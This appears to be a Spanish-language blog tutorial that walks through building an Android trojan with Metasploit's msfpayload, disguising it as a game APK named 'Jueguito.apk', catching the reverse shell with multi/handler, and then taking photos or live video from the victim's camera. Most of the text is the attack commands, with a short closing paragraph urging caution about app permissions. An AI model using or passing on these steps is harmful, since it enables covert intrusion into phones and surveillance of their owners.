Hoy en día es posible contar con casi cualquier servicios en un smartphones, ya sea hacer compras, charlar, enviar archivos, enterarse de lo que pasa en el mundo al instante, el tener almacenado tus dato personales, ya sea correos, contraseñas, etc… Por eso que es uno de los puntos de mira de los piratas informáticos, por que es uno de los aparatos que mas utiliza uno para almacenar información privada y valiosa.
Demostrare un ejemplo sencillo de como tener acceso a un dispositivo Android en pocos pasos…
Tendremos que abrir una terminal para usar la herramienta msfpayload que es la que nos servirá para que hagamos nuestro Troyano tipeando lo siguiente:
$ msfpayload android/meterpreter/reverse_tcp LHOST="IP_Privada" R > /root/Jueguito.apk
Nota: Aquí es donde se genera la APK en el directorio /root
Luego nos dirigimos a abrir otra terminal e iniciamos el Metasploit:
$ msfconsole
Utilizaremos el manejador (Handler) de Metasploit
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set LHOST "IP_Privada"
Ahora es momento de aventar el anzuelo! Para iniciar el handler debemos de tipear lo siguiente:
$ exploit
Realizare la instalación de la APK en mi celular. Tome la .APK que se encontraba en el directorios /root y luego la movil a mi celular.
Procedo a instalar la APK, acepto los permisos, y ahora nos dirigimos a Metasploit que ya creo una sesión shell remota. Para hacer una prueba de lo que podemos hacer, seria tipear webcam_list, lo que hace es enlistar las cámaras que tiene el dispositivo, seleccionamos alguna y luego nos conectamos a la cámara con la siguiente orden webcam_snap, que es para tomar una foto o webcam_stream, que es para captar en vivo.
El sentido de esto, es siempre ser precavido, esto es una forma realmente sencilla de como crear un troyano para un dispositivo Android, se consciente de que tipo de aplicación descargas e instalas en un dispositivo donde almacenas información muy importante, procura siempre descargar aplicaciones desde su sitio oficial donde donde los desarrolladores los cuelgan, no digo que sea 100% el también confiable de solo instalar apps de la Google Play pues se a dado casos de apps maliciosas, trata de siempre lee los permisos de instalación.
Sentido común de que si mi jueguito.apk es un juego, entonces para que quisiera tener algún permiso para enviar SMS o hacer llamadas telefónicas y Si es posible también procurar revisar el código que cada aplicación.
Android Manifest de la APK
🌐📢 Comparte este contenido y contribuye a la difusión de ideas en el mundo digital. 🚀🌍
Deja un comentario